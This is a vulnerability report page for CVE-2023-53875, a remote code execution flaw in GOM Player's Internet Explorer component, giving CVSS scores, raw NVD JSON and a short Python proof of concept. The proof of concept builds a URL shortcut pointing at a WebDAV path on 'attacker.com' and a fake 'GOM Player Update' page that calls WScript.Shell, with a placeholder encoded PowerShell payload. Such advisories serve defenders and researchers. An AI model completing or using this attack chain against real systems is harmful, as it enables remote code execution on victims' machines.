Security Vulnerability Report
中文
CVE-2023-53875 CVSS 8.8 HIGH

CVE-2023-53875

Published: 2025-12-15 21:15:50
Last Modified: 2025-12-18 22:35:31

Description

GOM Player 2.3.90.5360 contains a remote code execution vulnerability in its Internet Explorer component that allows attackers to execute arbitrary code through DNS spoofing. Attackers can redirect victims using a malicious URL shortcut and WebDAV technique to run a reverse shell with SMB server interaction.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gomlab:gom_player:2.3.90.5360:*:*:*:*:*:*:* - VULNERABLE
GOM Player 2.3.90.5360

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2023-53875 PoC - GOM Player RCE via IE Component # This PoC demonstrates the attack chain for educational purposes import http.server import socketserver import os # Malicious URL shortcut content (.url file) malicious_url_content = '''[InternetShortcut] URL=file://ATTACKER_SERVER/webdav/malicious.html ''' # Malicious HTML that triggers RCE malicious_html = '''<!DOCTYPE html> <html> <head><title>GOM Player Update</title></head> <body> <script> // Attempt to execute arbitrary code through IE component // In real attack, this would use various techniques like: // - HTA execution via mshta.exe // - Scriptlet execution via scrobj.dll // - ActiveXObject abuse // Example reverse shell payload (encoded) var shell = new ActiveXObject('WScript.Shell'); // shell.Run('powershell -e BASE64_ENCODED_PAYLOAD'); </script> </body> </html> ''' def create_poc_files(): """Generate PoC files for testing""" # Create malicious URL shortcut with open('exploit.url', 'w') as f: f.write(malicious_url_content.replace('ATTACKER_SERVER', 'attacker.com')) # Create malicious HTML with open('malicious.html', 'w') as f: f.write(malicious_html) print('[+] PoC files created successfully') print('[+] 1. exploit.url - Malicious URL shortcut') print('[+] 2. malicious.html - Malicious payload page') if __name__ == '__main__': create_poc_files() print('[!] This PoC is for educational/testing purposes only') print('[!] Do not use for unauthorized testing')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53875", "sourceIdentifier": "[email protected]", "published": "2025-12-15T21:15:50.137", "lastModified": "2025-12-18T22:35:31.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GOM Player 2.3.90.5360 contains a remote code execution vulnerability in its Internet Explorer component that allows attackers to execute arbitrary code through DNS spoofing. Attackers can redirect victims using a malicious URL shortcut and WebDAV technique to run a reverse shell with SMB server interaction."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gomlab:gom_player:2.3.90.5360:*:*:*:*:*:*:*", "matchCriteriaId": "560DA310-4E30-486A-81C3-8B94C9157D38"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51719", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.gomlab.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/gom-player-remote-code-execution-via-insecure-ie-component", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/51719", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}